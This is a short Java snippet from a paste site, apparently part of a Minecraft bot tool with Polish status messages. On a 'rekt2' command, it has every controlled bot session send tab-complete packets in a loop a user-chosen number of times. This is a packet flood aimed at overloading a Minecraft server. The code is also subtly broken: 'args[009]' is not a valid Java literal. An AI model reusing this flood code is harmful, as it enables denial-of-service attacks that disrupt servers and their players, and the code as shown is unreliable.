Advertisement
Guest User

Untitled

a guest
Dec 15th, 2017
76
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.72 KB | None | 0 0
  1. GameProfile nick = s.getFlag(MinecraftConstants.PROFILE_KEY);
  2. String user = nick.getName();
  3. User u = UserManager.getUser(user);
  4. if (args[009].equals("rekt2")){
  5. int times = Integer.parseInt(args[19]);
  6. ChatUtil.sendMessage(s, "&8>> &6Wysylam pakiet &7TABOWANIE &8(&cx "+times+"&8)");
  7. s.send(new ServerTitlePacket(ChatUtil.fixColor("&8>> &6Wysylanie pakietow &8<<"), false));
  8. s.send(new ServerTitlePacket(ChatUtil.fixColor("&8>> &7TABOWANIE &8(&6x &7"+times+"&8) &8<<"), true));
  9. for (int i = 0; i < times; i++) {
  10. for (Session bot : u.getBots()) {
  11. bot.send(new ClientTabCompletePacket("100000000"));
  12. }
  13. }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement